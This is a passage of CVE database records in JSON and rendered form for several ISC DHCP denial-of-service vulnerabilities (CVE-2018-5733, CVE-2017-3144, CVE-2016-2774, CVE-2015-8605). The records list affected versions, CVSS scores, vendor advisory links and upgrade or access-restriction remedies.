"url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20250425-0010/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ISC DHCP",
"vendor": "ISC",
"versions": [
{
"status": "affected",
"version": "ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
}
],
"datePublic": "2018-02-28T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Successful exploitation of this vulnerability may exhaust the memory available to dhcpd and/or cause it to crash, resulting in a denial of service to clients.",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-01-17T10:57:01.000Z",
"orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"shortName": "isc"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/docs/aa-01567"
},
{
"name": "RHSA-2018:0469",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0469"
},
{
"name": "DSA-4133",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "https://www.debian.org/security/2018/dsa-4133"
},
{
"name": "USN-3586-2",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "https://usn.ubuntu.com/3586-2/"
},
{
"name": "RHSA-2018:0483",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0483"
},
{
"name": "USN-3586-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "103188",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/103188"
},
{
"name": "1040437",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1040437"
},
{
"name": "[debian-lts-announce] 20180322 [SECURITY] [DLA 1313-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of DHCP.\n\n DHCP 4.1-ESV-R15-P1\n DHCP 4.3.6-P1\n DHCP 4.4.1"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "A malicious client can overflow a reference counter in ISC dhcpd",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-officer@isc.org",
"DATE_PUBLIC": "2018-02-28T00:00:00.000Z",
"ID": "CVE-2018-5733",
"STATE": "PUBLIC",
"TITLE": "A malicious client can overflow a reference counter in ISC dhcpd"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ISC DHCP",
"version": {
"version_data": [
{
"version_name": "ISC DHCP",
"version_value": "4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
}
]
}
}
]
},
"vendor_name": "ISC"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Successful exploitation of this vulnerability may exhaust the memory available to dhcpd and/or cause it to crash, resulting in a denial of service to clients."
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.isc.org/docs/aa-01567",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/docs/aa-01567"
},
{
"name": "RHSA-2018:0469",
"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2018:0469"
},
{
"name": "DSA-4133",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2018/dsa-4133"
},
{
"name": "USN-3586-2",
"refsource": "UBUNTU",
"url": "https://usn.ubuntu.com/3586-2/"
},
{
"name": "RHSA-2018:0483",
"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2018:0483"
},
{
"name": "USN-3586-1",
"refsource": "UBUNTU",
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "103188",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/103188"
},
{
"name": "1040437",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1040437"
},
{
"name": "[debian-lts-announce] 20180322 [SECURITY] [DLA 1313-1] isc-dhcp security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html"
}
]
},
"solution": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of DHCP.\n\n DHCP 4.1-ESV-R15-P1\n DHCP 4.3.6-P1\n DHCP 4.4.1"
}
],
"source": {
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"assignerShortName": "isc",
"cveId": "CVE-2018-5733",
"datePublished": "2019-01-16T20:00:00.000Z",
"dateReserved": "2018-01-17T00:00:00.000Z",
"dateUpdated": "2025-04-25T23:02:52.084Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-3144 (GCVE-0-2017-3144)
Vulnerability from cvelistv5 – Published: 2019-01-16 20:00 – Updated: 2024-09-16 22:46
VLAI?
Title
Failure to properly clean up closed OMAPI connections can exhaust available sockets
Summary
A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. Affects ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested.
Severity ?
5.3 (Medium)
CWE
- By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server. Once exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator. While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc.
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
Date Public ?
2018-01-16 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T14:16:28.230Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2018:0158",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0158"
},
{
"name": "DSA-4133",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "https://www.debian.org/security/2018/dsa-4133"
},
{
"name": "102726",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/102726"
},
{
"name": "1040194",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1040194"
},
{
"name": "USN-3586-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/docs/aa-01541"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ISC DHCP",
"vendor": "ISC",
"versions": [
{
"status": "affected",
"version": "ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested."
}
]
}
],
"datePublic": "2018-01-16T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. Affects ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server.\n\nOnce exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator. While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc.",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-01-17T10:57:01.000Z",
"orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"shortName": "isc"
},
"references": [
{
"name": "RHSA-2018:0158",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0158"
},
{
"name": "DSA-4133",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "https://www.debian.org/security/2018/dsa-4133"
},
{
"name": "102726",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/102726"
},
{
"name": "1040194",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1040194"
},
{
"name": "USN-3586-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/docs/aa-01541"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Failure to properly clean up closed OMAPI connections can exhaust available sockets",
"workarounds": [
{
"lang": "en",
"value": "The recommended remedy is to disallow access to the OMAPI control port from unauthorized clients (in accordance with best practices for server operation)."
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-officer@isc.org",
"DATE_PUBLIC": "2018-01-16T00:00:00.000Z",
"ID": "CVE-2017-3144",
"STATE": "PUBLIC",
"TITLE": "Failure to properly clean up closed OMAPI connections can exhaust available sockets"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ISC DHCP",
"version": {
"version_data": [
{
"version_name": "ISC DHCP",
"version_value": "4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested."
}
]
}
}
]
},
"vendor_name": "ISC"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. Affects ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server.\n\nOnce exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator. While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc."
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "RHSA-2018:0158",
"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2018:0158"
},
{
"name": "DSA-4133",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2018/dsa-4133"
},
{
"name": "102726",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/102726"
},
{
"name": "1040194",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1040194"
},
{
"name": "USN-3586-1",
"refsource": "UBUNTU",
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "https://kb.isc.org/docs/aa-01541",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/docs/aa-01541"
}
]
},
"source": {
"discovery": "UNKNOWN"
},
"work_around": [
{
"lang": "en",
"value": "The recommended remedy is to disallow access to the OMAPI control port from unauthorized clients (in accordance with best practices for server operation)."
}
]
}
}
},
"cveMetadata": {
"assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"assignerShortName": "isc",
"cveId": "CVE-2017-3144",
"datePublished": "2019-01-16T20:00:00.000Z",
"dateReserved": "2016-12-02T00:00:00.000Z",
"dateUpdated": "2024-09-16T22:46:13.879Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-2774 (GCVE-0-2016-2774)
Vulnerability from cvelistv5 – Published: 2016-03-09 15:26 – Updated: 2024-08-05 23:32
VLAI?
Summary
ISC DHCP 4.1.x before 4.1-ESV-R13 and 4.2.x and 4.3.x before 4.3.4 does not restrict the number of concurrent TCP sessions, which allows remote attackers to cause a denial of service (INSIST assertion failure or request-processing outage) by establishing many sessions.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
Date Public ?
2016-03-07 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T23:32:20.980Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2016:2590",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://rhn.redhat.com/errata/RHSA-2016-2590.html"
},
{
"name": "1035196",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1035196"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-01354"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
},
{
"name": "FEDORA-2016-821f013cb1",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183640.html"
},
{
"name": "USN-3586-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "openSUSE-SU-2016:1843",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2016-07/msg00066.html"
},
{
"name": "FEDORA-2016-c93d49faf3",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183458.html"
},
{
"name": "84208",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/84208"
},
{
"name": "[debian-lts-announce] 20191124 [SECURITY] [DLA 2003-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00023.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-03-07T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "ISC DHCP 4.1.x before 4.1-ESV-R13 and 4.2.x and 4.3.x before 4.3.4 does not restrict the number of concurrent TCP sessions, which allows remote attackers to cause a denial of service (INSIST assertion failure or request-processing outage) by establishing many sessions."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-11-24T19:07:04.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "RHSA-2016:2590",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://rhn.redhat.com/errata/RHSA-2016-2590.html"
},
{
"name": "1035196",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1035196"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-01354"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
},
{
"name": "FEDORA-2016-821f013cb1",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183640.html"
},
{
"name": "USN-3586-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "openSUSE-SU-2016:1843",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2016-07/msg00066.html"
},
{
"name": "FEDORA-2016-c93d49faf3",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183458.html"
},
{
"name": "84208",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/84208"
},
{
"name": "[debian-lts-announce] 20191124 [SECURITY] [DLA 2003-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00023.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-2774",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "ISC DHCP 4.1.x before 4.1-ESV-R13 and 4.2.x and 4.3.x before 4.3.4 does not restrict the number of concurrent TCP sessions, which allows remote attackers to cause a denial of service (INSIST assertion failure or request-processing outage) by establishing many sessions."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "RHSA-2016:2590",
"refsource": "REDHAT",
"url": "http://rhn.redhat.com/errata/RHSA-2016-2590.html"
},
{
"name": "1035196",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1035196"
},
{
"name": "https://kb.isc.org/article/AA-01354",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-01354"
},
{
"name": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html",
"refsource": "CONFIRM",
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
},
{
"name": "FEDORA-2016-821f013cb1",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183640.html"
},
{
"name": "USN-3586-1",
"refsource": "UBUNTU",
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "openSUSE-SU-2016:1843",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2016-07/msg00066.html"
},
{
"name": "FEDORA-2016-c93d49faf3",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183458.html"
},
{
"name": "84208",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/84208"
},
{
"name": "[debian-lts-announce] 20191124 [SECURITY] [DLA 2003-1] isc-dhcp security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00023.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-2774",
"datePublished": "2016-03-09T15:26:00.000Z",
"dateReserved": "2016-02-26T00:00:00.000Z",
"dateUpdated": "2024-08-05T23:32:20.980Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2015-8605 (GCVE-0-2015-8605)
Vulnerability from cvelistv5 – Published: 2016-01-14 22:00 – Updated: 2024-08-06 08:20
VLAI?
Summary
ISC DHCP 4.x before 4.1-ESV-R12-P1, 4.2.x, and 4.3.x before 4.3.3-P1 allows remote attackers to cause a denial of service (application crash) via an invalid length field in a UDP IPv4 packet.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||
Date Public ?
2016-01-12 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T08:20:43.591Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1034657",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1034657"
},
{
"name": "openSUSE-SU-2016:0610",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00168.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-01334"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
},
{
"name": "FEDORA-2016-0c5bb21bf1",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/175594.html"
},
{
"name": "DSA-3442",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2016/dsa-3442"
},
{
"name": "USN-2868-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "http://www.ubuntu.com/usn/USN-2868-1"
},
{
"name": "FEDORA-2016-adb533a418",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176031.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
},
{
"name": "80703",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/80703"
},
{
"name": "openSUSE-SU-2016:0601",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00162.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-12T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "ISC DHCP 4.x before 4.1-ESV-R12-P1, 4.2.x, and 4.3.x before 4.3.3-P1 allows remote attackers to cause a denial of service (application crash) via an invalid length field in a UDP IPv4 packet."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-12-05T14:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1034657",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1034657"
},
{
"name": "openSUSE-SU-2016:0610",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00168.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-01334"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
},
{
"name": "FEDORA-2016-0c5bb21bf1",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/175594.html"
},
{
"name": "DSA-3442",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2016/dsa-3442"
},
{
"name": "USN-2868-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "http://www.ubuntu.com/usn/USN-2868-1"
},
{
"name": "FEDORA-2016-adb533a418",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176031.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
},
{
"name": "80703",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/80703"
},
{
"name": "openSUSE-SU-2016:0601",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00162.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2015-8605",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "ISC DHCP 4.x before 4.1-ESV-R12-P1, 4.2.x, and 4.3.x before 4.3.3-P1 allows remote attackers to cause a denial of service (application crash) via an invalid length field in a UDP IPv4 packet."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1034657",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1034657"
},
{
"name": "openSUSE-SU-2016:0610",
"refsource": "SUSE",
